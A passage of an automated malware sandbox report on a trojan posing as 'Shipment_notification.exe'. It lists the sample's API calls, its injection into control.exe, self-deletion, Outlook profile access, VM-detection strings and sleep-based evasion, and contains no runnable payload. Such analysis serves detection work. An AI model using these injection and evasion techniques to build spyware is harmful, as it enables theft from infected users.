          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004055AD
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004055B3
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00421E42
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004206A3
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00422752
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004057D3
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0040BF90
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0040BF93
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0040179B
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004017A0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B04120
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEF900
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B120A0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB20A8
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFB090
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1002
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1EBB0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB2B28
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB22AE
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12581
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFD5E0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE0D20
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB2D07
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB1D55
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF841F
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB1FF1
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB2EF7
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: String function: 01AEB150 appears 35 times
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041E5A3 NtCreateFile,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041E653 NtReadFile,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041E6D3 NtClose,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041E783 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041E64E NtReadFile,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041E77D NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041E7FD NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B298F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B295D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B299D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B298A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B2B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B2A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B295F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B2AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29560 NtWriteFile,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B2A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B2A770 NtOpenThread,
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29760 NtOpenProcess,
          Source: Shipment_notification.exe, 00000000.00000002.340502146.00000000035E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000000.00000002.336955451.00000000026B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000000.00000002.336955451.00000000026A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000000.00000002.336955451.0000000002627000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000000.00000002.353586112.0000000006DF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000002.00000003.333262180.00000000018A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000002.00000003.336325695.0000000001A43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A85000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000002.00000002.378214888.0000000001BDF000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipment_notification.exe
          Source: Shipment_notification.exeBinary or memory string: OriginalFilenameCYYO.exe> vs Shipment_notification.exe
          Source: Shipment_notification.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Shipment_notification.exeReversingLabs: Detection: 39%
          Source: Shipment_notification.exeVirustotal: Detection: 43%
          Source: Shipment_notification.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Shipment_notification.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\Shipment_notification.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipment_notification.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile created: C:\Users\user\AppData\Local\Temp\10W12dXJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/3@12/7
          Source: Shipment_notification.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Shipment_notification.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Shipment_notification.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Shipment_notification.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Shipment_notification.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: CYYO.pdb source: Shipment_notification.exe
          Source: Binary string: wntdll.pdbUGP source: Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Shipment_notification.exe, Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CYYO.pdbSHA256 source: Shipment_notification.exe
          Source: Binary string: control.pdbUGP source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00411824 push ds; ret
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004108E0 push ecx; retf
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041BC00 push eax; iretd
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00410CF7 push ecx; iretd
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041A550 push ecx; retf
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041B56C push ss; retf
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041A523 push edx; ret
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00405DEB push 00000056h; retf
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00401D80 push eax; ret
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041B5B8 pushad ; iretd
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00406E76 pushfd ; ret
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00410631 push ecx; retf
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00405F31 push ss; iretd
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B3D0D1 push ecx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.877600970637655

          Hooking and other Techniques for Hiding and Protection

          barindex
          Deletes itself after installation
          Source: C:\Windows\SysWOW64\control.exeFile deleted: c:\users\user\desktop\shipment_notification.exeJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exe TID: 1364Thread sleep time: -40023s >= -30000s
          Source: C:\Users\user\Desktop\Shipment_notification.exe TID: 3648Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 4540Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB5BA5 rdtsc
          Source: C:\Users\user\Desktop\Shipment_notification.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 884
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeThread delayed: delay time: 40023
          Source: C:\Users\user\Desktop\Shipment_notification.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000003.00000003.548908442.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.533768505.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535250683.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.560492432.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
          Source: explorer.exe, 00000003.00000000.357414824.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000003.550742798.000000000870B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000003.00000000.357414824.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000003.550742798.000000000870B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.582481631.0000000004424000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000003.550742798.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.357414824.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB5BA5 rdtsc
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B04120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B63884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B63884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7B8D0 mov eax, dword ptr fs:[00000030h]
